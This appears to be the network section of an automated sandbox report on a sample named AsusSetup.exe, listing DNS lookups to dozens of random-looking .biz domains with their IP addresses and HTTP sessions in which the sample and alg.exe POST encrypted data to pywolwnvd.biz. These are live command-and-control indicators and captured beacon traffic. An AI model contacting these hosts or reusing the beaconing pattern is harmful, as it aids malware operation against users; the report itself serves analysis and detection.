                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.026309967 CET192.168.2.51.1.1.10x2199Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.184406042 CET192.168.2.51.1.1.10xfafStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.505151987 CET192.168.2.51.1.1.10x9680Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.115056038 CET192.168.2.51.1.1.10xce63Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.124059916 CET192.168.2.51.1.1.10x55edStandard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.376104116 CET192.168.2.51.1.1.10x2620Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.751931906 CET192.168.2.51.1.1.10x41fbStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.451435089 CET192.168.2.51.1.1.10x181cStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.915152073 CET192.168.2.51.1.1.10x5143Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.038057089 CET192.168.2.51.1.1.10xd69eStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.667340040 CET192.168.2.51.1.1.10x2099Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.145462990 CET192.168.2.51.1.1.10x1066Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.200151920 CET192.168.2.51.1.1.10xd766Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.171866894 CET192.168.2.51.1.1.10x5701Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.040499926 CET192.168.2.51.1.1.10x1220Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.042457104 CET192.168.2.51.1.1.10xf12aStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.964453936 CET192.168.2.51.1.1.10xfb3Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.446038008 CET192.168.2.51.1.1.10x635dStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.635479927 CET192.168.2.51.1.1.10xf29cStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.091511965 CET192.168.2.51.1.1.10x93dcStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825014114 CET192.168.2.51.1.1.10xef31Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.848088980 CET192.168.2.51.1.1.10xb1d7Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.316127062 CET192.168.2.51.1.1.10xbd9bStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.339103937 CET192.168.2.51.1.1.10x4a54Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.823595047 CET192.168.2.51.1.1.10x4a4eStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.317483902 CET192.168.2.51.1.1.10xf03cStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.033188105 CET192.168.2.51.1.1.10xeb53Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.885278940 CET192.168.2.51.1.1.10xf03eStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.490998983 CET192.168.2.51.1.1.10x9812Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.424464941 CET192.168.2.51.1.1.10xce81Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.273962021 CET192.168.2.51.1.1.10x9b59Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.715226889 CET192.168.2.51.1.1.10xe00dStandard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.567548990 CET192.168.2.51.1.1.10xf0bbStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.584938049 CET192.168.2.51.1.1.10xf0bbStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.344449997 CET192.168.2.51.1.1.10xdc7Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.039546967 CET192.168.2.51.1.1.10x373fStandard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.898952007 CET192.168.2.51.1.1.10xd21eStandard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.587510109 CET192.168.2.51.1.1.10xe651Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.461843967 CET192.168.2.51.1.1.10x9973Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.177464962 CET192.168.2.51.1.1.10xebfcStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.104918957 CET192.168.2.51.1.1.10xee3bStandard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.964350939 CET192.168.2.51.1.1.10x556fStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.838552952 CET192.168.2.51.1.1.10xd3deStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.320836067 CET192.168.2.51.1.1.10x9996Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.580005884 CET192.168.2.51.1.1.10xe23Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.306361914 CET192.168.2.51.1.1.10x43f0Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.912970066 CET192.168.2.51.1.1.10xf12bStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.922346115 CET192.168.2.51.1.1.10x47bdStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.944669962 CET192.168.2.51.1.1.10x47bdStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.791177988 CET192.168.2.51.1.1.10x1135Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.806479931 CET192.168.2.51.1.1.10xc96fStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.815094948 CET192.168.2.51.1.1.10xc69aStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.037302017 CET1.1.1.1192.168.2.50x2199No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.192347050 CET1.1.1.1192.168.2.50xfafNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.514775991 CET1.1.1.1192.168.2.50x9680No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.133649111 CET1.1.1.1192.168.2.50x55edNo error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.384679079 CET1.1.1.1192.168.2.50x2620No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.760292053 CET1.1.1.1192.168.2.50x41fbNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.459930897 CET1.1.1.1192.168.2.50x181cNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.120539904 CET1.1.1.1192.168.2.50x5143No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.046371937 CET1.1.1.1192.168.2.50xd69eNo error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.676110983 CET1.1.1.1192.168.2.50x2099No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.339181900 CET1.1.1.1192.168.2.50x1066No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.208785057 CET1.1.1.1192.168.2.50xd766No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.180802107 CET1.1.1.1192.168.2.50x5701No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.051558018 CET1.1.1.1192.168.2.50x1220No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.050436020 CET1.1.1.1192.168.2.50xf12aNo error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.973980904 CET1.1.1.1192.168.2.50xfb3No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.454154015 CET1.1.1.1192.168.2.50x635dNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.644123077 CET1.1.1.1192.168.2.50xf29cNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.099509001 CET1.1.1.1192.168.2.50x93dcNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.858166933 CET1.1.1.1192.168.2.50xb1d7No error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.324261904 CET1.1.1.1192.168.2.50xbd9bNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.346837044 CET1.1.1.1192.168.2.50x4a54No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.832168102 CET1.1.1.1192.168.2.50x4a4eNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.326235056 CET1.1.1.1192.168.2.50xf03cNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.041331053 CET1.1.1.1192.168.2.50xeb53No error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.894041061 CET1.1.1.1192.168.2.50xf03eNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.775540113 CET1.1.1.1192.168.2.50xb940No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.775577068 CET1.1.1.1192.168.2.50xb940No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.640727997 CET1.1.1.1192.168.2.50x9a05No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.629086971 CET1.1.1.1192.168.2.50x1a38No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.068480015 CET1.1.1.1192.168.2.50x4a68No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.073437929 CET1.1.1.1192.168.2.50x814aNo error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.527640104 CET1.1.1.1192.168.2.50x84f9No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.251173973 CET1.1.1.1192.168.2.50xb8d1No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.195848942 CET1.1.1.1192.168.2.50x4c39No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.195888996 CET1.1.1.1192.168.2.50x4c39No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.639446974 CET1.1.1.1192.168.2.50xaa11No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.948714972 CET1.1.1.1192.168.2.50xcf2fNo error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.830969095 CET1.1.1.1192.168.2.50x1f81No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.831022024 CET1.1.1.1192.168.2.50x1f81No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.912482023 CET1.1.1.1192.168.2.50x7673No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.638003111 CET1.1.1.1192.168.2.50x4528No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.621853113 CET1.1.1.1192.168.2.50x5a6dNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.489981890 CET1.1.1.1192.168.2.50xe503No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.342746019 CET1.1.1.1192.168.2.50x179fNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.642637014 CET1.1.1.1192.168.2.50x2dbfNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.643920898 CET1.1.1.1192.168.2.50x2dbfNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.331598997 CET1.1.1.1192.168.2.50xe2c2No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.058105946 CET1.1.1.1192.168.2.50xba4fNo error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.736538887 CET1.1.1.1192.168.2.50x3b71No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434878111 CET1.1.1.1192.168.2.50x8436No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.898654938 CET1.1.1.1192.168.2.50xed7dNo error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.573326111 CET1.1.1.1192.168.2.50x51b1No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • zrlssa.biz
Session ID: 0
Source IP: 192.168.2.5
Source Port: 49704
Destination IP: 54.244.188.177
Destination Port: 80
PID: 5880
Process: C:\Users\user\Desktop\AsusSetup.exe

Timestamp: Oct 28, 2024 16:49:58.906426907 CET
Bytes transferred: 347
Direction: OUT
Data:
POST /ea HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 800

Timestamp: Oct 28, 2024 16:49:58.906460047 CET
Bytes transferred: 800
Direction: OUT
Data:
Data Raw: 95 9f cf 89 e7 d9 d3 a4 14 03 00 00 64 61 8d ac ca f0 2e 70 f8 ee 3c 6e c9 04 20 da 45 bb 2b c8 33 ae fd 10 37 1b b4 8c 8b cb e0 6a 3c 30 51 4b bb f4 82 fa 6a c3 4b 5e bb c3 0d 1b b1 d2 c5 e9 16 62 8d 4a 1e d0 0e 9b ca 87 a2 59 7e 59 f6 bd 83 c3
Data Ascii: da.p<n E+37j<0QKjK^bJY~Y9v+TxPNn,.c~{u|1iX?dSa4*J8"uA2QcqZ#mz8l2`jOY'#><%bCbp##gbS:ez3!>mFgx7

Timestamp: Oct 28, 2024 16:49:59.867952108 CET
Bytes transferred: 417
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:49:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=17ca32f998ed4d44dafd0914b115316e|155.94.241.188|1730130599|1730130599|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1
Source IP: 192.168.2.5
Source Port: 49705
Destination IP: 54.244.188.177
Destination Port: 80
PID: 2636
Process: C:\Windows\System32\alg.exe

Timestamp: Oct 28, 2024 16:50:00.000165939 CET
Bytes transferred: 354
Direction: OUT
Data:
POST /juldvutdr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Timestamp: Oct 28, 2024 16:50:00.000225067 CET
Bytes transferred: 778
Direction: OUT
Data:
Data Raw: 56 7d b8 a6 ee 10 2a 12 fe 02 00 00 ec bb 53 7f fd 94 72 e7 65 ad 86 43 20 02 49 03 67 bd c3 94 4e ef 2b 84 00 b9 ae bd 9a 68 9f d3 68 f5 02 0c cf 45 34 f9 2e 85 d8 14 9b 73 ca 77 32 f1 ff 24 b1 65 0c 29 4b da 18 f0 ab 6b 44 96 cf b6 5f 48 ba 40
Data Ascii: V}*SreC IgN+hhE4.sw2$e)KkD_H@vSX1gWvt^3GO/:~ls'LLF!YVw&Izi+9n+-PnmrP]vhF{a!S _=l

Timestamp: Oct 28, 2024 16:50:00.842086077 CET
Bytes transferred: 417
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
